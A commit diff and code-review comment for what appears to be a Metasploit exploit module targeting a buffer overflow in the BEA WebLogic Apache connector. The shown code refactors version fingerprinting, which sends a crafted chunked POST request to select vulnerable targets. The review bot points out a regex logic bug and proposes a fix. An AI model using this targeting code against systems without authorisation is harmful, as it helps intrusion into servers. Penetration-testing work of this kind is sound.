trying to improve bea weblogic connector bof
This commit is contained in:
parent
c0d17734ed
commit
e7f5bf132c
|
@ -22,12 +22,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Weblogic Apache plugin.
|
||||
|
||||
The connector fails to properly handle specially crafted HTTP POST
|
||||
requests, resulting a buffer overflow due to the insecure usage
|
||||
of sprintf. Currently, this module works over Windows systems without DEP,
|
||||
and has been tested with Windows 2000 / XP.
|
||||
requests resulting in a buffer overflow due to the insecure usage
|
||||
of sprintf.
|
||||
|
||||
In addition, the Weblogic Apache plugin version is fingerprinted with a POST
|
||||
The Weblogic Apache plugin version is fingerprinted with a POST
|
||||
request containing a specially crafted Transfer-Encoding header.
|
||||
|
||||
At this moment this module works over Windows systems without DEP
|
||||
and has been tested with Windows 2000 / XP.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
@ -84,50 +86,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
|
||||
my_data = rand_text_alpha(rand(5) + 8)
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => target_uri.path,
|
||||
'headers' =>
|
||||
{
|
||||
'Transfer-Encoding' => my_data
|
||||
},
|
||||
'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
|
||||
})
|
||||
|
||||
if res and res.code == 200
|
||||
|
||||
# BEA WebLogic 8.1 SP6 - mod_wl_20.so
|
||||
if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
|
||||
res.body =~ /Change Number:<\/B> <I>779586/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
# BEA WebLogic 8.1 SP5 - mod_wl_20.so
|
||||
if res.body =~ /Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and
|
||||
res.body =~ /Change Number:<\/B> <I>616810/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
# BEA WebLogic 8.1 SP4 - mod_wl_20.so
|
||||
if res.body =~ /Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and
|
||||
res.body =~ /Change Number:<\/B> <I>452998/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
# Check for dates prior to patch release
|
||||
if res.body =~ /([A-Za-z]{3} [\s\d]{2} [\d]{4})/
|
||||
build_date = Date.parse($1)
|
||||
if build_date <= Date.parse("Jul 28 2008")
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
end
|
||||
fingerprint = fingerprint_mod_wl
|
||||
|
||||
case fingerprint
|
||||
when /Version found/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
when /BEA WebLogic connector vulnerable/
|
||||
return Exploit::CheckCode::Appears
|
||||
when /BEA WebLogic connector undefined/
|
||||
return Exploit::CheckCode::Detected
|
||||
when /BEA WebLogic connector no vulnerable/, /BEA WebLogic connector not found/
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -159,6 +133,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
fingerprint = fingerprint_mod_wl
|
||||
|
||||
case fingerprint
|
||||
when /BEA WebLogic 8.1 SP6 - mod_wl_20.so/
|
||||
return targets[1]
|
||||
when /BEA WebLogic 8.1 SP5 - mod_wl_20.so/
|
||||
return targets[2]
|
||||
when /BEA WebLogic 8.1 SP4 - mod_wl_20.so/
|
||||
return targets[3]
|
||||
else
|
||||
return nil
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def fingerprint_mod_wl
|
||||
|
||||
my_data = rand_text_alpha(rand(5) + 8)
|
||||
res = send_request_cgi(
|
||||
{
|
||||
|
@ -171,22 +162,31 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
|
||||
})
|
||||
|
||||
if res and res.code == 200
|
||||
if res and res.code == 200 and res.body =~ /Weblogic Bridge Message/
|
||||
# BEA WebLogic 8.1 SP6 - mod_wl_20.so
|
||||
if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
|
||||
res.body =~ /Change Number:<\/B> <I>779586/
|
||||
return targets[1]
|
||||
case res.body
|
||||
when (/Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and /Change Number:<\/B> <I>779586/)
|
||||
return "Version found: BEA WebLogic 8.1 SP6 - mod_wl_20.so"
|
||||
# BEA WebLogic 8.1 SP5 - mod_wl_20.so
|
||||
elsif res.body =~ /Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and
|
||||
res.body =~ /Change Number:<\/B> <I>616810/
|
||||
return targets[2]
|
||||
elsif res.body =~ /Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and
|
||||
res.body =~ /Change Number:<\/B> <I>452998/
|
||||
return targets[3]
|
||||
when (/Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and /Change Number:<\/B> <I>616810/)
|
||||
return "Version found: BEA WebLogic 8.1 SP5 - mod_wl_20.so"
|
||||
when (/Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and /Change Number:<\/B> <I>452998/)
|
||||
return "Version found: BEA WebLogic 8.1 SP4 - mod_wl_20.so"
|
||||
# Check for dates prior to patch release
|
||||
when /([A-Za-z]{3} [\s\d]{2} [\d]{4})/
|
||||
build_date = Date.parse($1)
|
||||
if build_date <= Date.parse("Jul 28 2008")
|
||||
return "BEA WebLogic connector vulnerable"
|
||||
else
|
||||
return "BEA WebLogic connector no vulnerable"
|
||||
end
|
||||
else
|
||||
return "BEA WebLogic connector undefined"
|
||||
end
|
||||
end
|
||||
|
||||
return nil
|
||||
return "BEA WebLogic connector not found"
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
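Review bot: The three `when (/Build date…/ and /Change Number…/)` arms in fingerprint_mod_wl do not test both patterns: a parenthesised `and` of two regex literals evaluates to the second literal, so each arm only matches on the Change Number and the build-date check is silently dropped (the pre-change `if … and …` form did test both). A lambda arm, or a single multi-line regex joining the two patterns, keeps the conjunction; the rewritten arms are below. The `when /([A-Za-z]{3} [\s\d]{2} [\d]{4})/` fallback then calls `Date.parse($1)` on whatever the response body happens to contain, which presumably can raise ArgumentError on a non-date match — a `rescue ArgumentError` that returns the "undefined" string would keep `check` from aborting on an odd server reply. fingerprint_mod_wl begins in the previous hunk; the closing `end` lines here belong to the method and the class.
```ruby
case res.body
when ->(body) { body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ && body =~ /Change Number:<\/B> <I>779586/ }
  return "Version found: BEA WebLogic 8.1 SP6 - mod_wl_20.so"
when ->(body) { body =~ /Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ && body =~ /Change Number:<\/B> <I>616810/ }
  return "Version found: BEA WebLogic 8.1 SP5 - mod_wl_20.so"
when ->(body) { body =~ /Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ && body =~ /Change Number:<\/B> <I>452998/ }
  return "Version found: BEA WebLogic 8.1 SP4 - mod_wl_20.so"
# … unchanged: pre-patch build-date fallback and the "undefined" arm …
```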